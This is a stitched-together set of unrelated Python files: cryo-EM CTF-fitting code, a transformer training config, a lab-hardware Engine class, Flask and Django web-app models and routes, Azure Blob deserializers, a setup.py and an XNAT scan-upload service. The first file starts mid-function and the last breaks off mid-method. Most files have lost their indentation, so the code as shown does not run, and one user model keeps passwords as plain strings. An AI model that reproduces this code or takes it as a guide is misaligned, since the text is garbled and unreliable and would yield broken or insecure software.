in_last_cycle_data = False
# read res limit and b factor
elif in_last_cycle and line.startswith('Resolution limit'):
resolution = float(line.split()[-1])
elif in_last_cycle and line.startswith('Estimated Bfactor'):
b_factor = float(line.split()[-1])
in_last_cycle = False
# read validation
elif line.find('VALIDATION_SCORE') >= 0:
validation_lines.append(line.strip('\n'))
# extract results
results_native = dict(
[(head, float(value))
for head, value in zip(head_split, data_split)])
results_native["Defocus_U"] = results_native["Defocus_U"] / 10000.
results_native["Defocus_V"] = results_native["Defocus_V"] / 10000.
#print(results_native)
key_dict = {
"Defocus_U":"defocus_1", "Defocus_V":"defocus_2",
"Angle":"angle", "CCC":"ccc", "Phase_shift":"phase"}
results = dict([
(key_dict[old_key], value)
for old_key, value in list(results_native.items())])
results['defocus'] = (results['defocus_1'] + results['defocus_2']) / 2.
results['phase'] = results.get('phase', 0) / 180.
results["resolution"] = resolution / 10.
results["b_factor"] = b_factor
#if results.get("phase") is None: results["phase"] = 0
results['ctf_path'] = ctf_path
results['pixel_a'] = pixel_a
for val_line in validation_lines:
val_list = val_line.strip().split()
name_suf = val_list[0].replace('-', '_')
results[cls.validation_prefix + name_suf] = int(val_list[-1])
# prepare header for defoci and phases
if print_head:
left_space = ' ' * (old_div((len(image_name) - 5), 2))
right_space = ' ' * (old_div((len(image_name) - 4), 2))
head_1 = (
left_space + "Image" + right_space +
" Defocus 1 Defocus 2 Phase Resolution")
head_2 = (
left_space + " " + right_space +
" um um [pi] nm ")
# prepare results
if print_results:
data_format = '%s %6.2f %6.2f %6.2f %6.2f '
data_vars = (
image_name, results["defocus_1"], results["defocus_2"],
results["phase"], results["resolution"])
# add validation to header and results
val_names = np.sort(
[val_nam for val_nam in results
if val_nam.startswith(cls.validation_prefix)])[::-1]
for val_nam in val_names:
if print_head:
head_1 += (" " + val_nam.split(cls.validation_prefix, 1)[1])
head_2 += " "
if print_results:
data_format += ' %2d '
data_vars += (results[val_nam],)
# print
if print_head:
print(head_1)
print(head_2)
if print_results:
print(data_format % data_vars)
# print validation
if print_validation:
for val_line in validation_lines:
print(val_line)
# plot ctf
epa = np.loadtxt(epa_path, skiprows=1)
if plot_ps:
plt.figure()
plt.plot(1./epa[:,0], epa[:,2])
plt.ylabel('ln(|F|)')
#if show_legend: plt.legend()
plt.show()
if plot_ctf:
plt.figure()
if b_plot:
exp_b = np.exp(-b_factor * 1./epa[:,0]**2 / 4.)
else:
exp_b = 1
plt.plot(1./epa[:,0], epa[:,1] * exp_b, label="CTF fit")
if exp_f_plot:
plt.plot(
1./epa[:,0], np.exp(epa[:,3]), label="$e^{ln(|F|-Bg)}$")
else:
plt.plot(1./epa[:,0], epa[:,3], label="$ln(|F|-Bg)$")
plt.xlabel('Resolution [1/A]')
if show_legend: plt.legend()
plt.show()
# return
return results
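    # Illustrative sketch (values are placeholders): the command line
    # assembled above maps generic parameter names to gctf flags via
    # gctf_names, so a params dict like {'voltage': 300, 'cs': 2.7, 'amp': 0.1}
    # together with pixel_a=1.33 would roughly produce:
    #
    #   gctf --kV 300 --Cs 2.7 --ac 0.1 --apix 1.33 /path/to/image.mrc
    #
    # (flag order follows the dict iteration order).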
@classmethod
def read_pixel_size(cls, image_path):
"""
Reads pixel size from an image file.
Raises ValueError if pixel size can not be read from the image
Argument:
- image_path: image path
Returns: pixel size in A
"""
image_io = ImageIO()
if image_path.endswith('.st'):
image_io.readHeader(file=image_path, fileFormat='mrc')
else:
image_io.readHeader(file=image_path)
if image_io.pixel is not None:
if isinstance(image_io.pixel, (list, tuple)):
pixel_a = 10 * image_io.pixel[0]
else:
pixel_a = 10 * image_io.pixel
else:
raise ValueError(
"Pixel size could not be found from image " + image_path +
". Please specify pixel_a as an argument.")
        # in case of 0 pixel size
        if pixel_a == 0:
            raise ValueError(
                "Pixel size read from image " + image_path + " is 0. "
                "Please specify pixel_a as an argument.")
return pixel_a
@classmethod
def flatten_stack(cls, stack_path, flat_dir):
"""
        Flattens an image stack, that is, sums up all z-slices and writes
        the resulting (flat) image.
        Arguments:
        - stack_path: path to the image stack
        - flat_dir: directory where the resulting image is saved
Returns resulting image path
"""
# parse stack path
stack_dir, stack_name = os.path.split(stack_path)
stack_base, stack_extension = stack_name.rsplit('.', 1)
if stack_extension == 'st':
stack_extension = 'mrc'
file_format = 'mrc'
else:
file_format = None
# read, flatten and write
flat_path = os.path.join(
flat_dir, stack_base + '_flat.' + stack_extension)
frame = Image.read(file=stack_path, fileFormat=file_format)
frame.data = np.sum(frame.data, axis=2, dtype=frame.data.dtype)
frame.write(file=flat_path, pixel=frame.pixelsize)
return flat_path
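    # Hedged example (class name and paths are hypothetical): flatten_stack()
    # sums the z-slices of a stack and writes the result into the given
    # directory, e.g.
    #
    #   flat = CtfDetection.flatten_stack(
    #       stack_path='frames/tomo_001.st', flat_dir='frames/ctf')
    #   # flat == 'frames/ctf/tomo_001_flat.mrc'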
|
from multiprocessing import cpu_count
TEMP_DIRECTORY = "temp/data"
TRAIN_FILE = "train.tsv"
TEST_FILE = "test.tsv"
DEV_RESULT_FILE = "dev_result.tsv"
DEV_EVAL_FILE = 'dev_eval.txt'
RESULT_FILE = "result.csv"
SUBMISSION_FOLDER = "transformers"
SUBMISSION_FILE = "transformers"
MODEL_TYPE = "xlmroberta"
MODEL_NAME = "xlm-roberta-large"
LANGUAGE_FINETUNE = False
SEED = 777
# training instances = 7000; with batch size = 8 that is ~875 batches per epoch, so evaluate_during_training_steps of 80 or 175 gives a few evaluations per epoch
args = {
'output_dir': 'temp/outputs/',
"best_model_dir": "temp/outputs/best_model",
'cache_dir': 'temp/cache_dir/',
'fp16': False,
'fp16_opt_level': 'O1',
'max_seq_length': 128, # 128
'train_batch_size': 8,
'gradient_accumulation_steps': 1,
'eval_batch_size': 8,
'num_train_epochs': 3,
'weight_decay': 0,
'learning_rate': 1e-5,
'adam_epsilon': 1e-8,
'warmup_ratio': 0.06,
'warmup_steps': 0,
'max_grad_norm': 1.0,
'do_lower_case': False,
'n_fold': 3,
'logging_steps': 60,
'save_steps': 60,
"no_cache": False,
"no_save": False,
"save_recent_only": True,
'save_model_every_epoch': True,
'evaluate_during_training': True,
"evaluate_during_training_silent": True,
'evaluate_during_training_steps': 60,
"evaluate_during_training_verbose": True,
'use_cached_eval_features': False,
"save_best_model": True,
'save_eval_checkpoints': True,
'tensorboard_dir': None,
"save_optimizer_and_scheduler": True,
'overwrite_output_dir': True,
'reprocess_input_data': True,
'process_count': cpu_count() - 2 if cpu_count() > 2 else 1,
'n_gpu': 1,
'use_multiprocessing': True,
"multiprocessing_chunksize": 500,
'silent': False,
'wandb_project': None,
'wandb_kwargs': {},
"use_early_stopping": True,
"early_stopping_patience": 10,
"early_stopping_delta": 0,
"early_stopping_metric": "eval_loss",
"early_stopping_metric_minimize": True,
"early_stopping_consider_epochs": False,
"manual_seed": SEED,
"config": {},
"local_rank": -1,
"encoding": None,
}
language_modeling_args = {
'output_dir': 'temp/lm/outputs/',
"best_model_dir": "temp/lm/outputs/best_model",
'cache_dir': 'temp/lm/cache_dir/',
'fp16': False,
'fp16_opt_level': 'O1',
'max_seq_length': 152, # 128
'train_batch_size': 8,
'gradient_accumulation_steps': 1,
'eval_batch_size': 8,
'num_train_epochs': 2,
'weight_decay': 0,
'learning_rate': 1e-5,
'adam_epsilon': 1e-8,
'warmup_ratio': 0.06,
'warmup_steps': 0,
'max_grad_norm': 1.0,
'do_lower_case': False,
'logging_steps': 80,
'save_steps': 80,
"no_cache": False,
"no_save": False,
"save_recent_only": True,
'save_model_every_epoch': True,
'evaluate_during_training': True,
"evaluate_during_training_silent": True,
'evaluate_during_training_steps': 80,
"evaluate_during_training_verbose": True,
'use_cached_eval_features': False,
"save_best_model": True,
'save_eval_checkpoints': True,
'tensorboard_dir': None,
"save_optimizer_and_scheduler": True,
'overwrite_output_dir': True,
'reprocess_input_data': True,
'process_count': cpu_count() - 2 if cpu_count() > 2 else 1,
'n_gpu': 1,
'use_multiprocessing': True,
"multiprocessing_chunksize": 500,
'silent': False,
'wandb_project': None,
'wandb_kwargs': {},
"use_early_stopping": True,
"early_stopping_patience": 10,
"early_stopping_delta": 0,
"early_stopping_metric": "eval_loss",
"early_stopping_metric_minimize": True,
"early_stopping_consider_epochs": False,
"manual_seed": SEED,
"config": {},
"local_rank": -1,
"encoding": None,
}
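# Hedged sketch (not part of the original config): these dicts follow the
# simpletransformers argument format, so a typical consumer might pass them to
# a ClassificationModel. The import and data frames below are assumptions
# about how this config is used elsewhere in the project.
#
#   from simpletransformers.classification import ClassificationModel
#   model = ClassificationModel(MODEL_TYPE, MODEL_NAME, args=args, use_cuda=True)
#   model.train_model(train_df, eval_df=dev_df)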
|
from .module import * # noqa
from .models import Trail, Hop # noqa
|
import logging
log = logging.getLogger(__name__)
import threading
import numpy as np
from atom.api import (Unicode, Float, Bool, observe, Property, Int, Typed,
Long, Value)
from enaml.core.api import Declarative, d_
from psi.core.enaml.api import PSIContribution
from ..util import copy_declarative
from .channel import (Channel, AnalogMixin, DigitalMixin, HardwareMixin,
SoftwareMixin, OutputMixin, InputMixin, CounterMixin)
def log_configuration(engine):
info = ['Engine configuration']
info.append('Engine {}'.format(engine.name))
for channel in engine.get_channels(direction='input', active=True):
info.append('\t channel {}'.format(channel.name))
for i in channel.inputs:
info.append('\t\t input {}'.format(i.name))
for channel in engine.get_channels(direction='output', active=True):
info.append('\t channel {}'.format(channel.name))
for o in channel.outputs:
info.append('\t\t output {}'.format(o.name))
log.info('\n'.join(info))
class Engine(PSIContribution):
'''
Defines hardware-specific interface
    The user-defined attributes are ones set by the end-user of this library in
their IO manifest. The IO manifest is system specific and describes the
hardware they are using for data acquisition.
User-defined attributes
-----------------------
name : string
Name of the engine. Must be unique across all engines. This name is
used for debugging and metadata purposes.
master_clock : bool
If true, this engine will provide a timestamp whenever it's requested
via `get_ts`. This is typically used for software-timed events (events
generated by the hardware will typically have a timestamp that's
determined by the engine that controls that particular device).
hw_ai_monitor_period : float (sec)
Poll period (in seconds). This defines how quickly acquired (analog
input) data is downloaded from the buffers (and made available to
listeners). If you want to see data as soon as possible, set the poll
period to a small value. If your application is stalling or freezing,
set this to a larger value. This poll period is a suggestion, not a
contract.
hw_ao_monitor_period : float (sec)
Poll period (in seconds). This defines how often callbacks for the
analog outputs are notified (i.e., to generate additional samples for
playout). If the poll period is too long, then the analog output may
run out of samples. This poll period is a suggestion, not a contract.
Attributes
----------
configured : bool
True if the hardware has been configured.
Notes
-----
When subclassing, you only need to implement the callbacks required by your
hardware. For example, if your hardware only has analog inputs, you only
need to implement the analog input methods.
'''
name = d_(Unicode()).tag(metadata=True)
master_clock = d_(Bool(False)).tag(metadata=True)
lock = Value()
configured = Bool(False)
hw_ai_monitor_period = d_(Float(0.1)).tag(metadata=True)
hw_ao_monitor_period = d_(Float(1)).tag(metadata=True)
def _default_lock(self):
return threading.Lock()
def get_channels(self, mode=None, direction=None, timing=None,
active=True):
'''
Return channels matching criteria
Parameters
----------
        mode : {None, 'analog', 'digital', 'counter'}
Type of channel
        direction : {None, 'input', 'output'}
Direction
timing : {None, 'hardware', 'software'}
Hardware or software-timed channel. Hardware-timed channels have a
sampling frequency greater than 0.
active : bool
If True, return only channels that have configured inputs or
outputs.
'''
channels = [c for c in self.children if isinstance(c, Channel)]
if active:
channels = [c for c in channels if c.active]
if timing is not None:
if timing in ('hardware', 'hw'):
channels = [c for c in channels if isinstance(c, HardwareMixin)]
elif timing in ('software', 'sw'):
channels = [c for c in channels if isinstance(c, SoftwareMixin)]
else:
raise ValueError('Unsupported timing')
if direction is not None:
if direction in ('input', 'in'):
channels = [c for c in channels if isinstance(c, InputMixin)]
elif direction in ('output', 'out'):
channels = [c for c in channels if isinstance(c, OutputMixin)]
else:
raise ValueError('Unsupported direction')
if mode is not None:
if mode == 'analog':
channels = [c for c in channels if isinstance(c, AnalogMixin)]
elif mode == 'digital':
channels = [c for c in channels if isinstance(c, DigitalMixin)]
elif mode == 'counter':
channels = [c for c in channels if isinstance(c, CounterMixin)]
else:
raise ValueError('Unsupported mode')
return tuple(channels)
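    # Hedged usage sketch (the engine instance and its channels are
    # hypothetical): filters compose, and passing None for a criterion leaves
    # it unconstrained.
    #
    #   hw_ai = engine.get_channels(mode='analog', direction='input',
    #                               timing='hw')
    #   all_outputs = engine.get_channels(direction='output', active=False)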
def get_channel(self, channel_name):
channels = self.get_channels(active=False)
for channel in channels:
if channel.name == channel_name:
return channel
m = '{} channel does not exist'.format(channel_name)
raise AttributeError(m)
def remove_channel(self, channel):
channel.set_parent(None)
def configure(self):
log_configuration(self)
for channel in self.get_channels():
log.debug('Configuring channel {}'.format(channel.name))
channel.configure()
self.configured = True
def register_ai_callback(self, callback, channel_name=None):
raise NotImplementedError
def register_et_callback(self, callback, channel_name=None):
raise NotImplementedError
def unregister_ai_callback(self, callback, channel_name=None):
raise NotImplementedError
def unregister_et_callback(self, callback, channel_name=None):
raise NotImplementedError
def register_done_callback(self, callback):
raise NotImplementedError
def write_hw_ao(self, data, offset, timeout=1):
'''
Write hardware-timed analog output data to the buffer
Parameters
----------
data : 2D array
Data to write (format channel x time)
offset : int
Sample at which to start writing data. Sample is relative to
beginning of data acquisition. This can overwrite data that has
already been written to the buffer but not consumed by the
hardware.
timeout : float
Time, in seconds, to keep trying to write the data before failing.
Notes
-----
When subclassing, raise an exception if the system attempts to write
data beginning at an offset that has already been consumed by the
hardware and cannot be modified.
'''
raise NotImplementedError
def get_ts(self):
raise NotImplementedError
def start(self):
raise NotImplementedError
def stop(self):
raise NotImplementedError
def reset(self):
raise NotImplementedError
def get_buffer_size(self, channel_name):
raise NotImplementedError
def get_offset(self, channel_name):
raise NotImplementedError
def update_hw_ao_multiple(self, offsets, channel_names, method):
raise NotImplementedError
def update_hw_ao(self, offsets, channel_name, method):
raise NotImplementedError
def clone(self, channel_names=None):
'''
Return a copy of this engine with specified channels included
This is intended as a utility function to assist various routines that
may need to do a quick operation before starting the experiment. For
example, calibration may only need to run a subset of the channels.
'''
new = copy_declarative(self)
if channel_names is not None:
for channel_name in channel_names:
channel = self.get_channel(channel_name)
copy_declarative(channel, parent=new)
return new
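# Hedged sketch (not part of this module): per the Notes in the class
# docstring, a hardware backend only needs to override the callbacks it
# supports. A minimal software-timed engine might look roughly like the
# commented example below; the clock source is an assumption.
#
#   import time
#
#   class DummyEngine(Engine):
#
#       def get_ts(self):
#           # software timestamp, used when master_clock is True
#           return time.monotonic()
#
#       def start(self):
#           if not self.configured:
#               self.configure()
#
#       def stop(self):
#           pass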
|
"""Models for final hackbright project """
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
db = SQLAlchemy()
app = Flask(__name__)
class Legislator(db.Model):
""" Info on current legislators. """
__tablename__ = "current_legislators"
legislator_id = db.Column(db.Integer, autoincrement=True, primary_key=True)
last_name = db.Column(db.String(25), nullable=False)
full_name = db.Column(db.String(200), nullable=False)
state = db.Column(db.String(20), nullable=False)
party = db.Column(db.String(50), nullable=False)
opensecrets_id = db.Column(db.String(10), nullable=True)
govtrack_id = db.Column(db.Integer, nullable=False)
votesmart_id = db.Column(db.Integer, nullable=True)
phone = db.Column(db.String(25), nullable=True)
website = db.Column(db.String(150), nullable=True)
def __repr__(self):
""" provide info on legislator."""
return f"Legislator: {self.full_name} party: {self.party}"
##### getting direction from Testing lab below #####
def testing_data():
""" create sample data for running tests """
legis = Legislator(last_name="Smith", full_name="Jane Smith", state="LA",
party="Democrat", opensecrets_id="N00003535",
govtrack_id=400050, votesmart_id=27018,
                       phone="504-555-5555", website="www.google.com")
db.session.add(legis)
db.session.commit()
def connect_to_db(app, db_uri="postgresql:///legislature"):
""" Connect database to Flask app."""
    # Configure to use my PostgreSQL database
app.config['SQLALCHEMY_DATABASE_URI'] = db_uri
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db.app = app
db.init_app(app)
if __name__ == "__main__":
# if I run this module interactively, it will leave
# me in a state of being able to work with the database directly.
from server import app
connect_to_db(app)
print("Connected to DB.")
|
"""clothes_shop URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url(r'^products/', include('products.urls')),
url(r'^admin/', admin.site.urls),
]
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
# pylint: disable=no-self-use
from typing import ( # pylint: disable=unused-import
Tuple, Dict, List,
TYPE_CHECKING
)
try:
from urllib.parse import unquote
except ImportError:
from urllib import unquote
from ._models import BlobType, CopyProperties, ContentSettings, LeaseProperties, BlobProperties, ImmutabilityPolicy
from ._shared.models import get_enum_value
from ._shared.response_handlers import deserialize_metadata
from ._models import ContainerProperties, BlobAnalyticsLogging, Metrics, CorsRule, RetentionPolicy, \
StaticWebsite, ObjectReplicationPolicy, ObjectReplicationRule
if TYPE_CHECKING:
from ._generated.models import PageList
def deserialize_pipeline_response_into_cls(cls_method, response, obj, headers):
try:
deserialized_response = response.http_response
except AttributeError:
deserialized_response = response
return cls_method(deserialized_response, obj, headers)
def deserialize_blob_properties(response, obj, headers):
blob_properties = BlobProperties(
metadata=deserialize_metadata(response, obj, headers),
object_replication_source_properties=deserialize_ors_policies(response.http_response.headers),
**headers
)
if 'Content-Range' in headers:
if 'x-ms-blob-content-md5' in headers:
blob_properties.content_settings.content_md5 = headers['x-ms-blob-content-md5']
else:
blob_properties.content_settings.content_md5 = None
return blob_properties
def deserialize_ors_policies(policy_dictionary):
if policy_dictionary is None:
return None
# For source blobs (blobs that have policy ids and rule ids applied to them),
# the header will be formatted as "x-ms-or-<policy_id>_<rule_id>: {Complete, Failed}".
# The value of this header is the status of the replication.
or_policy_status_headers = {key: val for key, val in policy_dictionary.items()
if 'or-' in key and key != 'x-ms-or-policy-id'}
parsed_result = {}
for key, val in or_policy_status_headers.items():
# list blobs gives or-policy_rule and get blob properties gives x-ms-or-policy_rule
policy_and_rule_ids = key.split('or-')[1].split('_')
policy_id = policy_and_rule_ids[0]
rule_id = policy_and_rule_ids[1]
# If we are seeing this policy for the first time, create a new list to store rule_id -> result
parsed_result[policy_id] = parsed_result.get(policy_id) or list()
parsed_result[policy_id].append(ObjectReplicationRule(rule_id=rule_id, status=val))
result_list = [ObjectReplicationPolicy(policy_id=k, rules=v) for k, v in parsed_result.items()]
return result_list
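# Illustrative example (header values are made up): given response headers
# such as
#
#   {'x-ms-or-policy-id': 'a1b2', 'x-ms-or-a1b2_rule1': 'Complete'}
#
# the policy-id header is ignored and the function returns a single
# ObjectReplicationPolicy with policy_id='a1b2' containing one
# ObjectReplicationRule(rule_id='rule1', status='Complete').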
def deserialize_blob_stream(response, obj, headers):
blob_properties = deserialize_blob_properties(response, obj, headers)
obj.properties = blob_properties
return response.http_response.location_mode, obj
def deserialize_container_properties(response, obj, headers):
metadata = deserialize_metadata(response, obj, headers)
container_properties = ContainerProperties(
metadata=metadata,
**headers
)
return container_properties
def get_page_ranges_result(ranges):
# type: (PageList) -> Tuple[List[Dict[str, int]], List[Dict[str, int]]]
page_range = [] # type: ignore
clear_range = [] # type: List
if ranges.page_range:
page_range = [{'start': b.start, 'end': b.end} for b in ranges.page_range] # type: ignore
if ranges.clear_range:
clear_range = [{'start': b.start, 'end': b.end} for b in ranges.clear_range]
return page_range, clear_range # type: ignore
def service_stats_deserialize(generated):
"""Deserialize a ServiceStats objects into a dict.
"""
return {
'geo_replication': {
'status': generated.geo_replication.status,
'last_sync_time': generated.geo_replication.last_sync_time,
}
}
def service_properties_deserialize(generated):
"""Deserialize a ServiceProperties objects into a dict.
"""
return {
'analytics_logging': BlobAnalyticsLogging._from_generated(generated.logging), # pylint: disable=protected-access
'hour_metrics': Metrics._from_generated(generated.hour_metrics), # pylint: disable=protected-access
'minute_metrics': Metrics._from_generated(generated.minute_metrics), # pylint: disable=protected-access
'cors': [CorsRule._from_generated(cors) for cors in generated.cors], # pylint: disable=protected-access
'target_version': generated.default_service_version, # pylint: disable=protected-access
'delete_retention_policy': RetentionPolicy._from_generated(generated.delete_retention_policy), # pylint: disable=protected-access
'static_website': StaticWebsite._from_generated(generated.static_website), # pylint: disable=protected-access
}
def get_blob_properties_from_generated_code(generated):
blob = BlobProperties()
if generated.name.encoded:
blob.name = unquote(generated.name.content)
else:
blob.name = generated.name.content
blob_type = get_enum_value(generated.properties.blob_type)
blob.blob_type = BlobType(blob_type) if blob_type else None
blob.etag = generated.properties.etag
blob.deleted = generated.deleted
blob.snapshot = generated.snapshot
blob.is_append_blob_sealed = generated.properties.is_sealed
blob.metadata = generated.metadata.additional_properties if generated.metadata else {}
blob.encrypted_metadata = generated.metadata.encrypted if generated.metadata else None
blob.lease = LeaseProperties._from_generated(generated) # pylint: disable=protected-access
blob.copy = CopyProperties._from_generated(generated) # pylint: disable=protected-access
blob.last_modified = generated.properties.last_modified
blob.creation_time = generated.properties.creation_time
blob.content_settings = ContentSettings._from_generated(generated) # pylint: disable=protected-access
blob.size = generated.properties.content_length
blob.page_blob_sequence_number = generated.properties.blob_sequence_number
blob.server_encrypted = generated.properties.server_encrypted
blob.encryption_scope = generated.properties.encryption_scope
blob.deleted_time = generated.properties.deleted_time
blob.remaining_retention_days = generated.properties.remaining_retention_days
blob.blob_tier = generated.properties.access_tier
blob.rehydrate_priority = generated.properties.rehydrate_priority
blob.blob_tier_inferred = generated.properties.access_tier_inferred
blob.archive_status = generated.properties.archive_status
blob.blob_tier_change_time = generated.properties.access_tier_change_time
blob.version_id = generated.version_id
blob.is_current_version = generated.is_current_version
blob.tag_count = generated.properties.tag_count
blob.tags = parse_tags(generated.blob_tags) # pylint: disable=protected-access
blob.object_replication_source_properties = deserialize_ors_policies(generated.object_replication_metadata)
blob.last_accessed_on = generated.properties.last_accessed_on
blob.immutability_policy = ImmutabilityPolicy._from_generated(generated) # pylint: disable=protected-access
blob.has_legal_hold = generated.properties.legal_hold
blob.has_versions_only = generated.has_versions_only
return blob
def parse_tags(generated_tags):
# type: (Optional[List[BlobTag]]) -> Union[Dict[str, str], None]
"""Deserialize a list of BlobTag objects into a dict.
"""
if generated_tags:
tag_dict = {t.key: t.value for t in generated_tags.blob_tag_set}
return tag_dict
return None
|
"""
@file setup.py
@brief Build and install the pycvm
@author The SCEC/UCVM Developers - <software@scec.usc.edu>
"""
from setuptools import setup
NAME = "ucvm_plotting"
FULLNAME = "ucvm_plotting with pycvm"
AUTHOR = "The SCEC/UCVM Developers"
AUTHOR_EMAIL = "software@scec.usc.edu"
MAINTAINER = AUTHOR
MAINTAINER_EMAIL = AUTHOR_EMAIL
LICENSE = "Apache 2.0 license"
URL = "https://github.com/SCEC/ucvm_plotting"
DESCRIPTION = "Python code extensions for UCVM and plotting library for the SCEC UCVM"
with open("README.md") as f:
LONG_DESCRIPTION = "".join(f.readlines())
VERSION = "0.0.2"
CLASSIFIERS = [
    "Development Status :: 3 - Alpha",
"Intended Audience :: Science/Research",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Topic :: Scientific/Engineering",
"Topic :: Software Development :: Libraries",
"Programming Language :: Python :: 2.7",
"License :: OSI Approved :: {}".format(LICENSE),
]
PLATFORMS = "Any"
INSTALL_REQUIRES = ["numpy", "matplotlib", "basemap", "packaging"]
KEYWORDS = ["UCVM"]
if __name__ == "__main__":
setup(
name=NAME,
fullname=FULLNAME,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
version=VERSION,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
maintainer=MAINTAINER,
maintainer_email=MAINTAINER_EMAIL,
license=LICENSE,
url=URL,
platforms=PLATFORMS,
classifiers=CLASSIFIERS,
keywords=KEYWORDS,
install_requires=INSTALL_REQUIRES,
packages=["pycvm"],
scripts=["ucvm_plotting/make_map_grid.py","ucvm_plotting/plot_compare_plot.py",
"ucvm_plotting/plot_cross_section.py","ucvm_plotting/plot_density_plot.py",
"ucvm_plotting/plot_depth_profile.py","ucvm_plotting/plot_elevation_cross_section.py",
"ucvm_plotting/plot_elevation_horizontal_slice.py","ucvm_plotting/plot_elevation_map.py",
"ucvm_plotting/plot_elevation_profile.py","ucvm_plotting/plot_horizontal_slice.py",
"ucvm_plotting/plot_scatter_plot.py","ucvm_plotting/plot_vs30_etree_map.py",
"ucvm_plotting/plot_vs30_map.py","ucvm_plotting/plot_z10_map.py",
"ucvm_plotting/plot_z25_map.py",
"utilities/makegrid.sh","utilities/view_png.py"]
)
|
from flask_login import UserMixin
from . import db
# run the create_all() command to create the database
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
last_name = db.Column(db.String(100))
first_name = db.Column(db.String(100))
email = db.Column(db.String(100), unique=True)
password = db.Column(db.String(100))
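# Hedged sketch (an assumption about the surrounding package, whose name and
# factory function are not shown here): creating the table above from a shell
# might look roughly like
#
#   from myproject import create_app, db
#   app = create_app()
#   with app.app_context():
#       db.create_all()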
|
# -*- coding: utf-8 -*-
"""Scan service.
This module implements uploading a scan file to XNAT and adding a scan to the database.
Todo: Maybe the public method should be called add, and that should kick off an upload procedure, rather than the
other way around.
Todo: do we want to infer file type from extension? Or use some other method?
Todo: Right now if we use the import service XNAT is inferring its own scan id. What do we want to do about that?
Todo: if someone uploads a zip file we don't actually know that there are dicoms inside (could be NIFTI). Consider this
fact.
Todo: Upload security for zip files?
"""
import os
from cookiecutter_mbam.xnat import XNATConnection
from cookiecutter_mbam.experiment import Experiment
from cookiecutter_mbam.user import User
from .models import Scan
from .utils import gzip_file
from flask import current_app
def debug():
assert current_app.debug == False, "Don't panic! You're here by request of debug()"
class ScanService:
def __init__(self, user_id, exp_id):
self.user_id = user_id
self.user = User.get_by_id(self.user_id)
self.experiment = Experiment.get_by_id(exp_id)
self.xc = XNATConnection()
# todo: what is the actual URI of the experiment I've created? Why does it have the XNAT prefix?
# maybe that's the accessor? Is the accessor in the URI?
def upload(self, image_file):
"""The top level public method for adding a scan
Calls methods to infer file type and further process the file, generate xnat identifiers and query strings,
check what XNAT identifiers objects have, upload the scan to XNAT, add the scan to the database, and update
user, experiment, and scan database objects with their XNAT-related attributes.
:param file object image_file: the file object
:return: None
"""
file, dcm = self._process_file(image_file)
xnat_ids = self._generate_xnat_identifiers(dcm=dcm)
existing_attributes = self._check_for_existing_xnat_ids()
uris = self.xc.upload_scan(xnat_ids, existing_attributes, image_file, import_service=dcm)
scan = self._add_scan()
keywords = ['subject', 'experiment', 'scan']
self._update_database_objects(keywords=keywords, objects=[self.user, self.experiment, scan],
ids=['{}_id'.format(xnat_ids[kw]['xnat_id']) for kw in keywords], uris=uris)
def _add_scan(self):
"""Add a scan to the database
Creates the scan object, adds it to the database, and increments the parent experiment's scan count
:return: scan
"""
scan = Scan.create(experiment_id=self.experiment.id)
self.experiment.num_scans += 1
return scan
def _process_file(self, image_file):
"""Infer file type from extension and respond to file type as necessary
Uses file extension to infer whether file should be left alone or gzipped, or whether zip file will be sent to
import service.
:param file object image_file: the file object
:return: a two-tuple of the image file, and a boolean indicating the file type is dcm
:rtype: tuple
"""
image_file_name = image_file.filename
file_name, file_ext = os.path.splitext(image_file_name)
dcm = False
if file_ext == '.nii':
image_file = (gzip_file(image_file, file_name))
if file_ext == '.zip':
dcm = True
return (image_file, dcm)
def _generate_xnat_identifiers(self, dcm=False):
"""Generate object ids for use in XNAT
Creates a dictionary with keys for type of XNAT object, including subject, experiment, scan, resource and file.
The values in the dictionary are dictionaries with keys 'xnat_id' and, optionally, 'query_string'. 'xnat_id'
points to the identifier of the object in XNAT, and 'query_string' to the query that will be used in the put
request to create the object.
:return: xnat_id dictionary
:rtype: dict
"""
xnat_ids = {}
xnat_ids['subject'] = {'xnat_id': str(self.user_id).zfill(6)}
xnat_exp_id = '{}_MR{}'.format(xnat_ids['subject']['xnat_id'], self.user.num_experiments)
exp_date = self.experiment.date.strftime('%m/%d/%Y')
xnat_ids['experiment'] = {'xnat_id': xnat_exp_id, 'query_string':'?xnat:mrSessionData/date={}'.format(exp_date)}
scan_number = self.experiment.num_scans + 1
xnat_scan_id = 'T1_{}'.format(scan_number)
xnat_ids['scan'] = {'xnat_id':xnat_scan_id, 'query_string':'?xsiType=xnat:mrScanData'}
if dcm:
resource = 'DICOM'
else:
resource = 'NIFTI'
xnat_ids['resource'] = {'xnat_id': resource}
xnat_ids['file'] = {'xnat_id':'T1.nii.gz', 'query_string':'?xsi:type=xnat:mrScanData'}
return xnat_ids
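    # Illustrative example (values are hypothetical): for user_id=12, a user
    # with num_experiments=2, an experiment dated 2019-01-31 with no scans
    # yet, and a NIFTI upload, the returned dictionary would look roughly like
    #
    #   {'subject': {'xnat_id': '000012'},
    #    'experiment': {'xnat_id': '000012_MR2',
    #                   'query_string': '?xnat:mrSessionData/date=01/31/2019'},
    #    'scan': {'xnat_id': 'T1_1', 'query_string': '?xsiType=xnat:mrScanData'},
    #    'resource': {'xnat_id': 'NIFTI'},
    #    'file': {'xnat_id': 'T1.nii.gz',
    #             'query_string': '?xsi:type=xnat:mrScanData'}}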
def _check_for_existing_xnat_ids(self):
"""Check for existing attributes on the user and experiment
Generates a dictionary with current xnat_subject_id for the user, xnat_experiment_id for the experiment as
values if they exist (empty string if they do not exist). A private method not designed to be accessed by other
classes.
:return: a dictionary with two keys with the xnat subject id and xnat experiment id.
:rtype: dict
"""
